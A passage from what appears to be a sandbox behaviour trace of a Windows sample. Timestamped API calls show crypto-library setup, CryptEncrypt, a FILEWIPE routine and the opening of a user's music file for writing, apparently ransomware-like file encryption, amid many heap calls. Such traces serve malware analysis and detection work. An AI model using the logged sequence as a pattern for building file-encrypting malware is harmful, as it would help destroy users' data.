dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.233] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.233] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.233] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0038.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.234] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.234] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.234] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.234] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.234] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.234] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.236] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1ccc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1cd0) returned 1 [0038.236] CharLowerBuffW (in: lpsz="byte[7377]", cchLength=0xa | out: lpsz="byte[7377]") returned 0xa [0038.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.236] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac56a0*, pdwDataLen=0x6ae220*=0x1ccc, dwBufLen=0x1cd0 | out: pbData=0xac56a0*, pdwDataLen=0x6ae220*=0x1cd0) returned 1 [0038.237] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.238] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.238] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0038.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.239] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.239] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.240] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.241] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b23f10, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0xc7bb7600, ftLastAccessTime.dwHighDateTime=0x1d5b93e, ftLastWriteTime.dwLowDateTime=0xc7bb7600, ftLastWriteTime.dwHighDateTime=0x1d5b93e, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x0, dwReserved1=0x777648, cFileName="lWN8-ZQxM7632S6p.m4a", cAlternateFileName="LWN8-Z~1.M4A")) returned 0x7c2240 [0038.241] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.241] CharLowerBuffW (in: lpsz="byte[7372]", cchLength=0xa | out: lpsz="byte[7372]") returned 0xa [0038.241] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.241] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.242] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.242] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.243] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.243] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.243] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lWN8-ZQxM7632S6p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lwn8-zqxm7632s6p.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ce0 | out: hHeap=0x770000) returned 1 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.245] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.245] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.245] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.245] RtlAllocateHeap (HeapHandle=0x770000, 